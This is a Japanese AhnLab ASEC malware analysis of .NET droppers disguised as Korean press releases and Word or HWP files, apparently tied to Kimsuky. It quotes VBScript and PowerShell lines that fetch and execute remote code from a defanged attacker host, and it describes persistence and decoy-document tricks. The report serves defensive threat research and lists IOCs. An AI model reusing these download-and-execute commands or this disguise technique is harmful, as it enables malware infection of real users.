ASEC 分析チームは、報道資料を装ったマルウェアが拡散していることを確認した。このマルウェアは、実行すると正常なドキュメントファイルをロードして不正な URL に接続を試みる。接続に成功すると、当該ページに存在するスクリプトが実行される。これは<対北朝鮮関連の原稿要求事項を装った APT 攻撃の試み (Kimsuky) >で確認された VBS コードと類似したタイプであることが確認された。
現在確認されているファイルは以下の通りである。
- 北朝鮮の新型コロナウイルス感染者発生の認定と今後の朝鮮半島の情勢展望.docx.exe
- 1. 報道資料(道内青少年対象、訪問ドローン体験教育運営).hwp .exe
- 2. 報道資料(第17回入養の日記念式、3年ぶりに開催).hwp .exe
- 3. 報道資料(**デザイン振興院、中小企業のデザイン隘路解決支援事業推進).hwp .exe
- 4. 報道資料(**道、家庭の月を迎え SNS イベントを進行).hwp .exe
ファイルは .NET で構成されており、ドキュメントファイルに見せかけるために HWP ファイルまたは Word アイコンに偽装している。
- 北朝鮮の新型コロナウイルス感染者発生の認定と今後の朝鮮半島の情勢展望.docx.exe
ファイルを開くと AppData フォルダーに Roamingtemp の名前でスクリプトファイルを生成したあと「wscript.exe /e:vbscript /b [Roamingtemp パス]\Roamingtemp」のコマンドにより実行する。
On Error Resume Next:
Set mx = CreateObject("Microsoft.XMLHTTP"):
mx.open "GET", "hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=1", False:
mx.Send:
Execute(mx.responseText)Roamingtemp ファイルを実行後 hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach.docx に接続して正常な Word ドキュメントをダウンロードする。ドキュメントファイルは実行ファイルのファイル名で保存され、現在確認されているファイルは以下の通りである。
参考に、この URL を確認した結果、実行ファイルと同じタイトルの Word ドキュメントがダウンロードされた履歴が確認された。したがって、実行ファイルが配布された当時は以下の Word ドキュメントがダウンロードされたものと推定できる。
その後、%Temp% フォルダーに e653d73e45833b6c という名前のファイルが存在するかを確認してメッセージボックスを生成する。ファイルが存在しない場合、e653d73e45833b6c ファイルを生成し、現在時刻をエンコードした値を保存してメッセージボックスを生成する。ファイルが存在する場合、ファイルに保存された時刻を現在時刻と比較し、その差が 0x7F days よりも大きい場合にのみメッセージボックスを生成する。メッセージボックスを生成することも、正常なファイルに見せかけるためであると推定できる。
アレアハングル形式のファイルに偽装したマルウェアの場合、Word ドキュメントの代わりに HWP ファイルをダウンロードし、ファイル名の .hwp と .exe の間の空白が特定バイト数存在することで、HWP ファイルが正常に生成されるという特徴がある。生成される Roamingtemp ファイルは、上記で説明したファイルと同じである。
| ファイル名 | ダウンロード URL |
|---|---|
| 1. 報道資料(道内青少年対象、訪れるドローン体験教育運営).hwp .exe | hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach1.hwp |
| 2. 報道資料(第17回入養の日記念式、3年ぶりに開催) .hwp .exe | hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach2.hwp |
| 3. 報道資料(**デザイン振興院、中小企業のデザイン隘路解決支援事業推進) .hwp .exe | hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach3.hwp |
| 4. 報道資料(**道、家庭の月を迎え SNS イベントを進行) .hwp .exe | hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/attach4.hwp |
実行ファイルを通じて生成されるドキュメントファイルはすべて正常なファイルである。これは、ユーザーが不正な振る舞いの実行に気づきにくいようにするためであると見られる。「3. 報道資料(**デザイン振興院、中小企業のデザイン隘路解決支援事業推進) .hwp .exe」で生成されるドキュメントファイルは以下の通りである。
ダウンロードされるファイルの内容と配布されたファイル名が一致しないことからして、現在も様々なファイル名で当該マルウェアを拡散させているものと推定される。
解析当時、Roamingtemp で確認された URL(hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=1)には<対北朝鮮関連の原稿要求事項を装った APT 攻撃の試み (Kimsuky)>で確認された VBS コードと類似したスクリプトコードが存在していた。
当該スクリプトの実行時、%AppData%\Microsoft\Windows\Templates フォルダーに OfficeAppManifest_v[分]_[時]_[日,月].xml という名前のファイルを生成したあと xml ファイルを実行するサービスを Microsoft の名前で登録する。
| On Error Resume Next:With CreateObject(“InternetExplorer.Application”):.Navigate “hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=6”:Do while .busy:WScript.Sleep 100:Loop:bt=.Document.Body.InnerText:.Quit:End With:Execute(bt) |
その後、ブラウザ関連の設定を変更して以下の PowerShell コマンドを実行する。現在はコマンドに含まれたアドレスに接続がされないため、PowerShell の実行以降の振る舞いは確認できない。
| cmd /c powershell -command “iex (wget hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/lib.php?idx=1).content; GetInfo -ur ‘hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload’; |
最近、対北朝鮮関連の内容だけでなく、報道資料を装ったマルウェアが出回っているため、ユーザーの注意が必要である。ファイルを開く前にファイルの拡張子を確認し、出どころが不明なファイルは開かないようにしなければならない。
現在 AhnLab V3 製品は、当該ファイルに対して以下の通り検知している。
[ファイル検知]
Downloader/VBS.Generic
Trojan/Win.MSILKrypt.R492841
[IOC]
d6730f10a839d128e94b5aa05d9fb1ec
5573953bf4dafa96877dacf3435db228
3ad7a29a1f661034da0b3779a4046849
a15c386db0a3d0d208042d0982f21f37
34b7356722b992992f5382b0761466bc
94fdc2115ce7f4ab0234a1e26901cb1c
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/attach/
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=1
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/list.php?query=6
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload/lib.php?idx=1
hxxp://mc.pzs[.]kr/themes/mobile/images/about/temp/upload
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories: マルウェアの情報